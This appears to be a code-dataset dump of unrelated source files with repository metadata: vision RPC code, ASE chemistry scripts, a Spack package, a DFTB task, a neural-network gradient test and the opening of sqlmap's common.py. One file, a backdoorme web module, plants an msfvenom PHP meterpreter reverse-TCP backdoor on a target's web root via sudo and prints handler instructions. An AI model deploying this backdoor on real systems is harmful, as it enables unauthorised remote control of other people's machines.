return self.featureMatrixMean.tolist() # will be a nested list, not flat
def main(managerType=VisionManager):
"""Run end-to-end visual system."""
context = Context.createInstance(description="Run a VisualSystem instance using a {}".format(managerType.__name__))
print "main(): Creating visual system and manager"
visSystem = VisualSystem()
visManager = managerType(visSystem)
if context.isRPCEnabled:
print "main(): Exporting RPC calls"
rpc.export(visSystem)
rpc.export(visManager)
rpc.refresh() # Context is expected to have started RPC server
print "main(): Starting vision loop"
run(visManager)
if context.isRPCEnabled:
rpc.stop_server() # do we need to do this if server is running as a daemon?
print "main(): Done."
def test_FeatureManager_RPC():
from time import sleep
from multiprocessing import Process, Value
Context.createInstance()
print "test_FeatureManager_RPC(): Creating visual system and manager"
visSystem = VisualSystem()
visManager = FeatureManager(visSystem)
print "test_FeatureManager_RPC(): Exporting RPC calls"
rpc.export(visSystem) # order of export vs. enable doesn't matter - everything will be resolved in refresh(), called by start_server()
rpc.export(visManager)
print "test_FeatureManager_RPC(): Starting RPC server thread"
rpcServerThread = rpc.start_server_thread(daemon=True)
# NOTE shared_loop_flag must be a multiprocessing.Value or .RawValue
# NOTE gui should be set to true only if this is being run in its own dedicated process, without any shared GUI infrastructure
def rpcClientLoop(shared_loop_flag, gui=False):
with rpc.Client() as rpcClient:
while shared_loop_flag.value == 1:
try:
for call in ['FeatureManager.getState', 'FeatureManager.getFeatureVector']: # 'VisualSystem.getOutputImage'
print "[RPC-Client] REQ:", call
retval = rpcClient.call(call)
if isinstance(retval, np.ndarray):
print "[RPC-Client] REP[image]: shape: {}, dtype: {}".format(retval.shape, retval.dtype)
# NOTE Qt (and possibly other backends) can only display from the main thread of a process
if gui:
cv2.imshow("VisualSystem output", retval)
cv2.waitKey(10)
else:
print "[RPC-Client] REP:", retval
if retval is None:
break
sleep(0.5) # small sleep to prevent flooding
sleep(0.5) # extra sleep after each state, vector pair
except KeyboardInterrupt:
break
print "test_FeatureManager_RPC(): Starting RPC client process"
rpc_client_loop_flag = Value('i', 1)
# NOTE No GUI output possible from child process; this will simply print metadata for any images received
rpcClientProcess = Process(target=rpcClientLoop, name="RPC-Client", args=(rpc_client_loop_flag,))
rpcClientProcess.daemon = True
rpcClientProcess.start()
sleep(0.01) # let new process start
print "test_FeatureManager_RPC(): Starting vision loop"
run(visManager)
print "test_FeatureManager_RPC(): Vision loop done; waiting for RPC threads/processes to join..."
rpc_client_loop_flag.value = 0
if rpc.Client.recv_timeout is not None: # just a guess, actual timeout used could be different
rpcClientProcess.join(rpc.Client.recv_timeout / 1000.0 + 1.0)
print "test_FeatureManager_RPC(): RPC client process joined (or timeout)"
rpc.stop_server()
if rpc.Server.recv_timeout is not None: # just a guess, actual timeout used could be different
rpcServerThread.join(rpc.Server.recv_timeout / 1000.0 + 1.0)
print "test_FeatureManager_RPC(): RPC server thread joined (or timeout)"
print "test_FeatureManager_RPC(): Done."
# Testing
if __name__ == "__main__":
# NOTE Defaults to using FeatureManager instead of VisionManager
choices = [('--test_rpc', "Test RPC functionality by running a client, server pair")]
context = Context.createInstance(parent_argparsers=[Context.createChoiceParser(choices)])
if context.options.test_rpc:
test_FeatureManager_RPC()
else:
main(managerType=FeatureManager) # will enable RPC calls if --rpc was passed in
|
napratin/nap
|
nap/vision/visual_system.py
|
Python
|
mit
| 62,141
|
[
"NEURON"
] |
ac79d2d39dd90b62cb00d6e232ad765e8cf214dcdaa13d897fbb0f449f99ebdc
|
from ase.io import read
from ase.calculators.emt import EMT
from ase.neb import NEB
from ase.optimize import BFGS
# read the last structures (of 5 images used in NEB)
images = read('neb.traj@-5:')
for i in range(1, len(images) - 1):
images[i].set_calculator(EMT())
neb = NEB(images)
qn = BFGS(neb, trajectory='neb_restart.traj')
qn.run(fmax=0.005)
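# The script above restarts an NEB run from an existing 'neb.traj'. For context, a minimal sketch of
# how the initial 5-image band could have been set up (illustrative only; the file names 'initial.traj'
# and 'final.traj' are assumptions, not part of this tutorial script):
#
#     from ase.io import read
#     from ase.calculators.emt import EMT
#     from ase.neb import NEB
#     from ase.optimize import BFGS
#     initial = read('initial.traj')   # relaxed initial configuration (assumed file)
#     final = read('final.traj')       # relaxed final configuration (assumed file)
#     images = [initial] + [initial.copy() for _ in range(3)] + [final]
#     for image in images[1:-1]:
#         image.set_calculator(EMT())
#     neb = NEB(images)
#     neb.interpolate()                                # linearly interpolate the intermediate images
#     BFGS(neb, trajectory='neb.traj').run(fmax=0.05)  # first, coarser optimization pass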
|
misdoro/python-ase
|
doc/tutorials/neb/diffusion4.py
|
Python
|
gpl-2.0
| 355
|
[
"ASE"
] |
8dd5764c47321dbf7071d0eb5197b7e255bccd567c4341cdb01ec65139e33817
|
import os
import re
import sys
import os.path
import tempfile
import functools
import ase.db
from ase.db.table import Table, all_columns
from ase.visualize import view
from ase.io.png import write_png
from ase.db.summary import Summary
from flask import Flask, render_template, request, send_from_directory
app = Flask(__name__)
connection = None
home = ''
tables = {}
tmpdir = tempfile.mkdtemp()
next_table_id = 1
open_ase_gui = True
# Find numbers in formulas so that we can convert H2O to H<sub>2</sub>O:
SUBSCRIPT = re.compile(r'(\d+)')
@app.route('/')
def index():
global next_table_id
table_id = int(request.args.get('x', '0'))
if table_id not in tables:
table_id = next_table_id
next_table_id += 1
query = ''
columns = list(all_columns)
sort = 'id'
limit = 100
opened = set()
else:
query, columns, sort, limit, opened = tables[table_id]
if 'toggle' in request.args:
column = request.args['toggle']
if column in columns:
columns.remove(column)
if column == sort.lstrip('-'):
sort = 'id'
else:
columns.append(column)
elif 'sort' in request.args:
column = request.args['sort']
if column == sort:
sort = '-' + column
elif '-' + column == sort:
sort = 'id'
else:
sort = column
elif 'query' in request.args:
query = request.args['query'].encode()
limit = int(request.args.get('limit', '0'))
columns = list(all_columns)
sort = 'id'
opened = set()
table = Table(connection)
table.select(query, columns, sort, limit)
tables[table_id] = query, table.columns, sort, limit, opened
table.format(SUBSCRIPT)
return render_template('table.html', t=table, query=query, sort=sort,
limit=limit, tid=table_id, opened=opened, home=home)
@app.route('/open_row/<int:id>')
def open_row(id):
table_id = int(request.args['x'])
opened = tables[table_id][-1]
if id in opened:
opened.remove(id)
return ''
opened.add(id)
return render_template('more.html',
dct=connection.get(id), id=id, tid=table_id)
@app.route('/image/<name>')
def image(name):
path = os.path.join(tmpdir, name).encode()
if not os.path.isfile(path):
id = int(name[:-4])
atoms = connection.get_atoms(id)
if atoms:
size = atoms.positions.ptp(0)
i = size.argmin()
rotation = ['-90y', '90x', ''][i]
size[i] = 0.0
scale = min(20, 20 / size.max() * 10.0)
else:
scale = 20
rotation = ''
write_png(path, atoms, show_unit_cell=1,
rotation=rotation, scale=scale)
return send_from_directory(tmpdir, name)
@app.route('/gui/<int:id>')
def gui(id):
if open_ase_gui:
atoms = connection.get_atoms(id)
view(atoms)
return '', 204, []
@app.route('/id/<int:id>')
def summary(id):
s = Summary(connection.get(id), SUBSCRIPT)
return render_template('summary.html', s=s, home=home)
def tofile(query, type, limit=0):
fd, name = tempfile.mkstemp(suffix='.' + type)
con = ase.db.connect(name, use_lock_file=False)
for dct in connection.select(query, limit=limit):
con.write(dct,
keywords=dct.get('keywords', []),
data=dct.get('data', {}),
**dct.get('key_value_pairs', {}))
os.close(fd)
data = open(name).read()
os.unlink(name)
return data
def download(f):
@functools.wraps(f)
def ff(*args, **kwargs):
text, name = f(*args, **kwargs)
headers = [('Content-Disposition',
'attachment; filename="{0}"'.format(name)),
] # ('Content-type', 'application/sqlite3')]
return text, 200, headers
return ff
@app.route('/json')
@download
def jsonall():
table_id = int(request.args['x'])
query, columns, sort, limit, opened = tables[table_id]
data = tofile(query, 'json', limit)
return data, 'selection.json'
@app.route('/json/<int:id>')
@download
def json(id):
data = tofile(id, 'json')
return data, '{0}.json'.format(id)
@app.route('/sqlite')
@download
def sqliteall():
table_id = int(request.args['x'])
query, columns, sort, limit, opened = tables[table_id]
data = tofile(query, 'db', limit)
return data, 'selection.db'
@app.route('/sqlite/<int:id>')
@download
def sqlite(id):
data = tofile(id, 'db')
return data, '{0}.db'.format(id)
@app.route('/robots.txt')
def robots():
return 'User-agent: *\nDisallow: /\n', 200
if __name__ == '__main__':
globals()['connection'] = ase.db.connect(sys.argv[1])
globals()['home'] = sys.argv[2]
globals()['open_ase_gui'] = False
app.run(host='0.0.0.0', port=5000, debug=False)
|
askhl/ase
|
ase/db/app.py
|
Python
|
gpl-2.0
| 5,037
|
[
"ASE"
] |
b08e29f7eef6e1f3ec15270c61ed0664c8bf10eb405d53e41e6621a53a0e4f7d
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RTxdbHsapiensUcscHg19Knowngene(RPackage):
"""Annotation package for TxDb object(s)
Exposes an annotation databases generated from UCSC by exposing these as
TxDb objects."""
# This is a bioconductor package but there is no available git repo.
homepage = "https://bioconductor.org/packages/release/data/annotation/html/TxDb.Hsapiens.UCSC.hg19.knownGene.html"
url = "https://bioconductor.org/packages/release/data/annotation/src/contrib/TxDb.Hsapiens.UCSC.hg19.knownGene_3.2.2.tar.gz"
version('3.2.2', sha256='063de2b1174782a0b2b8ab7f04a0bdf3c43252cb67c685a9f8ef2b8e318352e9')
depends_on('r-genomicfeatures@1.21.30:', type=('build', 'run'))
depends_on('r-annotationdbi', type=('build', 'run'))
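# Typical installation with the standard Spack CLI (shown here for illustration):
#   spack install r-txdb-hsapiens-ucsc-hg19-knowngene
#   spack info r-txdb-hsapiens-ucsc-hg19-knowngene   # show available versions and dependencies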
|
LLNL/spack
|
var/spack/repos/builtin/packages/r-txdb-hsapiens-ucsc-hg19-knowngene/package.py
|
Python
|
lgpl-2.1
| 962
|
[
"Bioconductor"
] |
a10b7579580a79c784e2178c19251e118ef4a96adeb4abdac8c741ddd792ba54
|
import json
import os
import time
from pychemia import pcm_log
from pychemia.crystal import KPoints
from ..dftb import DFTBplus, read_detailed_out
class StaticCalculation:
def __init__(self, structure, workdir, slater_path, waiting=False, kpoints=None, output_file='results.json',
max_scc_iterations=50):
self.structure = structure
self.workdir = workdir
self.slater_path = slater_path
self.waiting = waiting
self.MaxSCCIterations = max_scc_iterations
if isinstance(slater_path, str):
self.slater_path = [slater_path]
self.results = []
self.output_file = output_file
if kpoints is None:
self.kpoints = KPoints.optimized_grid(self.structure.lattice, kp_density=10000, force_odd=True)
else:
self.kpoints = kpoints
def run(self):
dftb = DFTBplus(workdir=self.workdir)
dftb.initialize(structure=self.structure, kpoints=self.kpoints)
dftb.set_slater_koster(search_paths=self.slater_path)
dftb.kpoints = self.kpoints
if os.path.isfile('charges.bin'):
os.remove('charges.bin')
for mixer in ['Broyden', 'Anderson', 'DIIS', 'Simple']:
dftb.basic_input()
dftb.hamiltonian['MaxSCCIterations'] = self.MaxSCCIterations
dftb.hamiltonian['Mixer'] = {'name': mixer}
if os.path.isfile('charges.bin'):
dftb.hamiltonian['ReadInitialCharges'] = True
ret = None
dftb.set_static()
dftb.set_inputs()
dftb.run()
if self.waiting:
dftb.runner.wait()
while True:
if dftb.runner is not None and dftb.runner.poll() is not None:
pcm_log.info('Execution completed. Return code %d' % dftb.runner.returncode)
filename = dftb.workdir + os.sep + 'detailed.out'
ret = read_detailed_out(filename)
print('Mixer= %10s Total_energy= %9.3f iSCC= %4d SCC_error= %9.3E' % (mixer,
ret['total_energy'],
ret['SCC']['iSCC'],
ret['SCC']['SCC_error']))
break
time.sleep(10)
if ret['SCC']['iSCC'] < self.MaxSCCIterations:
break
if ret is not None:
self.results.append({'Mixer': mixer,
'kp_grid': self.kpoints.grid,
'iSCC': ret['SCC']['iSCC'],
'Total_energy': ret['total_energy'],
'SCC_error': ret['SCC']['SCC_error']})
def save_json(self):
wf = open(self.output_file, 'w')
json.dump(self.results, wf)
wf.close()
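# Minimal usage sketch (illustrative; the structure source, workdir and Slater-Koster path are assumptions):
#
#     st = ...  # any pychemia Structure instance, e.g. built with your own structure reader
#     calc = StaticCalculation(st, workdir='static_run', slater_path='/path/to/slater-koster-files')
#     calc.run()
#     calc.save_json()  # dumps self.results to 'results.json' by default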
|
MaterialsDiscovery/PyChemia
|
pychemia/code/dftb/task/static.py
|
Python
|
mit
| 3,066
|
[
"CRYSTAL"
] |
e90e36e010ba28b4a8e4e3c4d0d7f9bcf999ef25b143c10776080b87964d86d5
|
from backdoors.backdoor import *
class Web(Backdoor):
prompt = Fore.RED + "(web) " + Fore.BLUE + ">> " + Fore.RESET
def __init__(self, core):
cmd.Cmd.__init__(self)
self.intro = GOOD + "Using Web module"
self.core = core
self.options = {
"port" : Option("port", 53929, "port to connect to", True),
"name" : Option("name", "backdoor.php", "name of backdoor", True),
}
self.allow_modules = True
self.modules = {}
self.help_text = INFO + "Ships a web server to the target, then uploads msfvenom's php reverse_tcp backdoor and connects to the host. Although this is also a php backdoor, it is not the same backdoor as the above php backdoor."
def get_command(self):
return "echo " + self.core.curtarget.pword + " | sudo -S php /var/www/html/" + self.get_value("name")
def do_exploit(self, args):
port = self.get_value("port")
name = self.get_value("name")
target = self.core.curtarget
target.scpFiles(self, "backdoors/auxiliary/web/install.sh", False)
target.ssh.exec_command("echo " + target.pword + " | sudo -S bash install.sh")
print(GOOD + "Starting Apache server on target...")
os.system("msfvenom -p php/meterpreter_reverse_tcp LHOST=" + self.core.localIP + " LPORT=" + str(port) + " -f raw > " + name)
print(GOOD + "Creating backdoor...")
target.scpFiles(self, name, False)
print(GOOD + "Shipping backdoor...")
target.ssh.exec_command("echo " + target.pword + " | sudo -S rm /var/www/html/" + name)
target.ssh.exec_command("echo " + target.pword + " | sudo -S mv " + name + " /var/www/html")
print("Start a handler with metasploit using the following commands: ")
print("> use exploit/multi/handler")
print("> set PAYLOAD php/meterpreter_reverse_tcp")
print("> set LHOST " + self.core.localIP)
print("> set LPORT " + str(port))
print("> exploit\n")
print("Then visit the site at " + target.hostname + "/" + name)
print("To begin your session, type sessions -i [session id]")
for mod in self.modules.keys():
print(INFO + "Attempting to execute " + mod.name + " module...")
mod.exploit()
|
sovaa/backdoorme
|
backdoors/shell/web.py
|
Python
|
mit
| 2,308
|
[
"VisIt"
] |
8288a3e54348bf5126478b654ca4d775727d720b1510ed5683ca83013aa7ce0b
|
# ----------------------------------------------------------------------------
# Copyright 2015 Nervana Systems Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
"""
This test compares the NEON recurrent layer against a numpy reference recurrent
implementation and compares the NEON recurrent bprop deltas to the gradients
estimated by finite differences.
The numpy reference recurrent layer contains static methods for forward pass
and backward pass.
The test runs a SINGLE layer of recurrent layer and compare numerical values
The reference model handles batch_size as 1 only
The following are made sure to be the same in both recurrent layers
- initial h values (all zeros)
- initial W, b (ones or random values)
- input data (random data matrix)
- input error (random data matrix)
- the data shape inside recurrent_ref is seq_len, input_size, 1
- the data shape inside recurrent (neon) is feature, seq_len * batch_size
"""
import itertools as itt
import numpy as np
from neon import NervanaObject
from neon.initializers.initializer import Constant, Gaussian
from neon.layers import Recurrent
from neon.transforms import Tanh
from tests.recurrent_ref import Recurrent as RefRecurrent
from tests.utils import allclose_with_out
def pytest_generate_tests(metafunc):
bsz_rng = [1]
if 'refgruargs' in metafunc.fixturenames:
fargs = []
if metafunc.config.option.all:
seq_rng = [2, 3, 4]
inp_rng = [3, 5, 10]
out_rng = [3, 5, 10]
else:
seq_rng = [3]
inp_rng = [5]
out_rng = [10]
fargs = itt.product(seq_rng, inp_rng, out_rng, bsz_rng)
metafunc.parametrize('refgruargs', fargs)
if 'gradgruargs' in metafunc.fixturenames:
fargs = []
if metafunc.config.option.all:
seq_rng = [2, 3]
inp_rng = [5, 10]
out_rng = [3, 5, 10]
else:
seq_rng = [3]
inp_rng = [5]
out_rng = [10]
fargs = itt.product(seq_rng, inp_rng, out_rng, bsz_rng)
metafunc.parametrize('gradgruargs', fargs)
def test_ref_compare_ones(backend_default, refgruargs):
# run comparison with reference code
# for all ones init
seq_len, input_size, hidden_size, batch_size = refgruargs
NervanaObject.be.bsz = NervanaObject.be.batch_size = batch_size
check_rnn(seq_len, input_size, hidden_size,
batch_size, Constant(val=1.0), [1.0, 0.0])
def test_ref_compare_rand(backend_default, refgruargs):
# run comparison with reference code
# for Gaussian random init
seq_len, input_size, hidden_size, batch_size = refgruargs
NervanaObject.be.bsz = NervanaObject.be.batch_size = batch_size
check_rnn(seq_len, input_size, hidden_size, batch_size,
Gaussian())
# compare neon RNN to reference RNN implementation
def check_rnn(seq_len, input_size, hidden_size,
batch_size, init_func, inp_moms=[0.0, 1.0]):
# init_func is the initializer for the model params
# inp_moms is the [ mean, std dev] of the random input
input_shape = (input_size, seq_len * batch_size)
output_shape = (hidden_size, seq_len * batch_size)
NervanaObject.be.bsz = NervanaObject.be.batch_size = batch_size
# ======== create models ========
# neon RNN
rnn = Recurrent(hidden_size, init_func, Tanh())
# reference numpy RNN
rnn_ref = RefRecurrent(input_size, hidden_size)
Wxh = rnn_ref.Wxh
Whh = rnn_ref.Whh
bh = rnn_ref.bh
# ========= generate data =================
# generate random input tensor
inp = np.random.rand(*input_shape)*inp_moms[1] + inp_moms[0]
inpa = rnn.be.array(inp)
# generate random deltas tensor
deltas = np.random.randn(*output_shape)
# the reference code expects these shapes:
# input_shape: (seq_len, input_size, batch_size)
# output_shape: (seq_len, hidden_size, batch_size)
inp_ref = inp.copy().T.reshape(
seq_len, batch_size, input_size).swapaxes(1, 2)
deltas_ref = deltas.copy().T.reshape(
seq_len, batch_size, hidden_size).swapaxes(1, 2)
# ========= running models ==========
# run neon fprop
rnn.configure((input_size, seq_len))
rnn.allocate()
rnn.fprop(inpa)
# weights are only initialized after doing fprop, so now
# make ref weights and biases the same with neon model
Wxh[:] = rnn.W_input.get()
Whh[:] = rnn.W_recur.get()
bh[:] = rnn.b.get()
(dWxh_ref, dWhh_ref, db_ref, h_ref_list,
dh_ref_list, d_out_ref) = rnn_ref.lossFun(inp_ref, deltas_ref)
# now test the bprop
rnn.bprop(rnn.be.array(deltas))
# grab the delta W from gradient buffer
dWxh_neon = rnn.dW_input.get()
dWhh_neon = rnn.dW_recur.get()
db_neon = rnn.db.get()
# comparing outputs
print '====Verifying hidden states===='
print allclose_with_out(rnn.h_buffer.get(),
h_ref_list,
rtol=0.0,
atol=1.0e-5)
print 'fprop is verified'
print '====Verifying update on W and b ===='
print 'dWxh'
assert allclose_with_out(dWxh_neon,
dWxh_ref,
rtol=0.0,
atol=1.0e-5)
print 'dWhh'
assert allclose_with_out(dWhh_neon,
dWhh_ref,
rtol=0.0,
atol=1.0e-5)
print '====Verifying update on bias===='
print 'db'
assert allclose_with_out(db_neon,
db_ref,
rtol=0.0,
atol=1.0e-5)
print 'bprop is verified'
return
def reset_rnn(rnn):
# in order to run fprop multiple times
# for the gradient check tests the
# rnn internal variables need to be
# cleared
rnn.x = None
rnn.xs = None # just in case
rnn.h_buffer = None
return
def test_gradient_neon_gru(backend_default, gradgruargs):
seq_len, input_size, hidden_size, batch_size = gradgruargs
NervanaObject.be.bsz = NervanaObject.be.batch_size = batch_size
gradient_check(seq_len, input_size, hidden_size, batch_size)
def gradient_check(seq_len, input_size, hidden_size, batch_size,
threshold=1.0e-3):
# 'threshold' is the max allowed absolute difference
# between the finite-difference gradient estimate and
# the bprop deltas (default is 1.0e-3)
# for a given set of layer parameters calculate
# the gradients and compare to the derivatives
# obtained with the bprop function. repeat this
# for a range of perturbations and use the
# perturbation size with the best results.
# This is necessary for 32 bit computations
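# Concretely, the estimate computed in gradient_calc() is the central difference
#     dL/dx_i ~= (L(x_i + eps) - L(x_i - eps)) / (2 * eps)
# evaluated for eps = 10**pert_exp over a range of exponents, keeping the perturbation size
# that gives the smallest maximum deviation from the bprop deltas.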
min_max_err = -1.0 # minimum max error
print 'Perturb mag, max grad diff'
for pert_exp in range(-5, 0):
# need to generate the scaling and input outside
# having an issue with the random number generator
# when these are generated inside the gradient_calc
# function
input_shape = (input_size, seq_len * batch_size)
output_shape = (hidden_size, seq_len * batch_size)
rand_scale = np.random.random(output_shape)*2.0 - 1.0
inp = np.random.randn(*input_shape)
pert_mag = 10.0**pert_exp
(grad_est, deltas) = gradient_calc(seq_len,
input_size,
hidden_size,
batch_size,
epsilon=pert_mag,
rand_scale=rand_scale,
inp_bl=inp)
dd = np.max(np.abs(grad_est-deltas))
print '%e, %e' % (pert_mag, dd)
if min_max_err < 0.0 or dd < min_max_err:
min_max_err = dd
# reset the seed so models are same in each run
# allclose_with_out(grad_est,deltas, rtol=0.0, atol=0.0)
NervanaObject.be.rng_reset()
# check that best value of worst case error is less than threshold
print 'Worst case error %e with perturbation %e' % (min_max_err, pert_mag)
print 'Threshold %e' % (threshold)
assert min_max_err < threshold
def gradient_calc(seq_len, input_size, hidden_size, batch_size,
epsilon=None, rand_scale=None, inp_bl=None):
NervanaObject.be.bsz = NervanaObject.be.batch_size = batch_size
input_shape = (input_size, seq_len * batch_size)
# generate input if one is not given
if inp_bl is None:
inp_bl = np.random.randn(*input_shape)
# neon rnn instance
rnn = Recurrent(hidden_size, Gaussian(), Tanh())
inpa = rnn.be.array(np.copy(inp_bl))
# run fprop on the baseline input
rnn.configure((input_size, seq_len))
rnn.allocate()
out_bl = rnn.fprop(inpa).get()
# random scaling/hash to generate fake loss
if rand_scale is None:
rand_scale = np.random.random(out_bl.shape) * 2.0 - 1.0
# loss function would be:
# loss_bl = np.sum(rand_scale * out_bl)
# run back prop with rand_scale as the errors
# use copy to avoid any interactions
deltas_neon = rnn.bprop(rnn.be.array(np.copy(rand_scale))).get()
# add a perturbation to each input element
grads_est = np.zeros(inpa.shape)
inp_pert = inp_bl.copy()
for pert_ind in range(inpa.size):
save_val = inp_pert.flat[pert_ind]
inp_pert.flat[pert_ind] = save_val + epsilon
reset_rnn(rnn)
rnn.allocate()
out_pos = rnn.fprop(rnn.be.array(inp_pert)).get()
inp_pert.flat[pert_ind] = save_val - epsilon
reset_rnn(rnn)
rnn.allocate()
out_neg = rnn.fprop(rnn.be.array(inp_pert)).get()
# calculate the loss with perturbations
loss_pos = np.sum(rand_scale*out_pos)
loss_neg = np.sum(rand_scale*out_neg)
# compute the gradient estimate
grad = 0.5*(loss_pos-loss_neg)/epsilon
grads_est.flat[pert_ind] = grad
# reset the perturbed input element
inp_pert.flat[pert_ind] = save_val
del rnn
return (grads_est, deltas_neon)
|
jfsantos/neon
|
tests/test_recurrent.py
|
Python
|
apache-2.0
| 10,800
|
[
"Gaussian"
] |
41bbb5146720ca5a61cda73b220df99afdc13c2021788f76e277129503ea39d0
|
#!/usr/bin/env python
"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import codecs
import contextlib
import cookielib
import copy
import getpass
import hashlib
import httplib
import inspect
import json
import logging
import ntpath
import os
import posixpath
import random
import re
import socket
import string
import sys
import tempfile
import time
import urllib
import urllib2
import urlparse
import unicodedata
from ConfigParser import DEFAULTSECT
from ConfigParser import RawConfigParser
from StringIO import StringIO
from difflib import SequenceMatcher
from math import sqrt
from optparse import OptionValueError
from subprocess import PIPE
from subprocess import Popen as execute
from xml.dom import minidom
from xml.sax import parse
from extra.cloak.cloak import decloak
from extra.safe2bin.safe2bin import safecharencode
from lib.core.bigarray import BigArray
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import paths
from lib.core.convert import base64pickle
from lib.core.convert import base64unpickle
from lib.core.convert import hexdecode
from lib.core.convert import htmlunescape
from lib.core.convert import stdoutencode
from lib.core.convert import unicodeencode
from lib.core.convert import utf8encode
from lib.core.decorators import cachedmethod
from lib.core.defaults import defaults
from lib.core.dicts import DBMS_DICT
from lib.core.dicts import DEFAULT_DOC_ROOTS
from lib.core.dicts import DEPRECATED_OPTIONS
from lib.core.dicts import SQL_STATEMENTS
from lib.core.enums import ADJUST_TIME_DELAY
from lib.core.enums import CONTENT_STATUS
from lib.core.enums import CHARSET_TYPE
from lib.core.enums import DBMS
from lib.core.enums import EXPECTED
from lib.core.enums import HEURISTIC_TEST
from lib.core.enums import HTTP_HEADER
from lib.core.enums import HTTPMETHOD
from lib.core.enums import OS
from lib.core.enums import PLACE
from lib.core.enums import PAYLOAD
from lib.core.enums import REFLECTIVE_COUNTER
from lib.core.enums import SORT_ORDER
from lib.core.exception import SqlmapDataException
from lib.core.exception import SqlmapFilePathException
from lib.core.exception import SqlmapGenericException
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapMissingDependence
from lib.core.exception import SqlmapSilentQuitException
from lib.core.exception import SqlmapSyntaxException
from lib.core.exception import SqlmapUserQuitException
from lib.core.log import LOGGER_HANDLER
from lib.core.optiondict import optDict
from lib.core.settings import BANNER
from lib.core.settings import BOLD_PATTERNS
from lib.core.settings import BRUTE_DOC_ROOT_PREFIXES
from lib.core.settings import BRUTE_DOC_ROOT_SUFFIXES
from lib.core.settings import BRUTE_DOC_ROOT_TARGET_MARK
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
from lib.core.settings import DBMS_DIRECTORY_DICT
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
from lib.core.settings import DEFAULT_MSSQL_SCHEMA
from lib.core.settings import DESCRIPTION
from lib.core.settings import DUMMY_SQL_INJECTION_CHARS
from lib.core.settings import DUMMY_USER_INJECTION
from lib.core.settings import DYNAMICITY_MARK_LENGTH
from lib.core.settings import ERROR_PARSING_REGEXES
from lib.core.settings import FORCE_COOKIE_EXPIRATION_TIME
from lib.core.settings import FORM_SEARCH_REGEX
from lib.core.settings import GENERIC_DOC_ROOT_DIRECTORY_NAMES
from lib.core.settings import GIT_PAGE
from lib.core.settings import GITHUB_REPORT_OAUTH_TOKEN
from lib.core.settings import GOOGLE_ANALYTICS_COOKIE_PREFIX
from lib.core.settings import HASHDB_MILESTONE_VALUE
from lib.core.settings import HOST_ALIASES
from lib.core.settings import INFERENCE_UNKNOWN_CHAR
from lib.core.settings import INVALID_UNICODE_CHAR_FORMAT
from lib.core.settings import IP_ADDRESS_REGEX
from lib.core.settings import ISSUES_PAGE
from lib.core.settings import IS_WIN
from lib.core.settings import LARGE_OUTPUT_THRESHOLD
from lib.core.settings import MIN_ENCODED_LEN_CHECK
from lib.core.settings import MIN_TIME_RESPONSES
from lib.core.settings import MIN_VALID_DELAYED_RESPONSE
from lib.core.settings import ML
from lib.core.settings import NETSCAPE_FORMAT_HEADER_COOKIES
from lib.core.settings import NULL
from lib.core.settings import PARAMETER_AMP_MARKER
from lib.core.settings import PARAMETER_SEMICOLON_MARKER
from lib.core.settings import PARTIAL_HEX_VALUE_MARKER
from lib.core.settings import PARTIAL_VALUE_MARKER
from lib.core.settings import PAYLOAD_DELIMITER
from lib.core.settings import PLATFORM
from lib.core.settings import PRINTABLE_CHAR_REGEX
from lib.core.settings import PYVERSION
from lib.core.settings import REFERER_ALIASES
from lib.core.settings import REFLECTED_BORDER_REGEX
from lib.core.settings import REFLECTED_MAX_REGEX_PARTS
from lib.core.settings import REFLECTED_REPLACEMENT_REGEX
from lib.core.settings import REFLECTED_VALUE_MARKER
from lib.core.settings import REFLECTIVE_MISS_THRESHOLD
from lib.core.settings import REVISION
from lib.core.settings import SENSITIVE_DATA_REGEX
from lib.core.settings import SITE
from lib.core.settings import SUPPORTED_DBMS
from lib.core.settings import TEXT_TAG_REGEX
from lib.core.settings import TIME_STDEV_COEFF
from lib.core.settings import UNICODE_ENCODING
from lib.core.settings import UNKNOWN_DBMS_VERSION
from lib.core.settings import URI_QUESTION_MARKER
from lib.core.settings import URLENCODE_CHAR_LIMIT
from lib.core.settings import URLENCODE_FAILSAFE_CHARS
from lib.core.settings import USER_AGENT_ALIASES
from lib.core.settings import VERSION
from lib.core.settings import VERSION_STRING
from lib.core.threads import getCurrentThreadData
from lib.utils.sqlalchemy import _sqlalchemy
from thirdparty.clientform.clientform import ParseResponse
from thirdparty.clientform.clientform import ParseError
from thirdparty.magic import magic
from thirdparty.odict.odict import OrderedDict
from thirdparty.termcolor.termcolor import colored
class UnicodeRawConfigParser(RawConfigParser):
"""
RawConfigParser with unicode writing support
"""
def write(self, fp):
"""
Write an .ini-format representation of the configuration state.
"""
if self._defaults:
fp.write("[%s]\n" % DEFAULTSECT)
for (key, value) in self._defaults.items():
fp.write("%s = %s\n" % (key, getUnicode(value, UNICODE_ENCODING).replace('\n', '\n\t')))
fp.write("\n")
for section in self._sections:
fp.write("[%s]\n" % section)
for (key, value) in self._sections[section].items():
if key != "__name__":
if value is None:
fp.write("%s\n" % (key))
else:
fp.write("%s = %s\n" % (key, getUnicode(value, UNICODE_ENCODING).replace('\n', '\n\t')))
fp.write("\n")
class Format(object):
@staticmethod
def humanize(values, chain=" or "):
return chain.join(values)
# Get methods
@staticmethod
def getDbms(versions=None):
"""
Format the back-end DBMS fingerprint value and return its
values formatted as a human readable string.
@return: detected back-end DBMS based upon fingerprint techniques.
@rtype: C{str}
"""
if versions is None and Backend.getVersionList():
versions = Backend.getVersionList()
return Backend.getDbms() if versions is None else "%s %s" % (Backend.getDbms(), " and ".join(v for v in versions))
@staticmethod
def getErrorParsedDBMSes():
"""
Parses the knowledge base htmlFp list and returns its values
formatted as a human readable string.
@return: list of possible back-end DBMS based upon error messages
parsing.
@rtype: C{str}
"""
htmlParsed = None
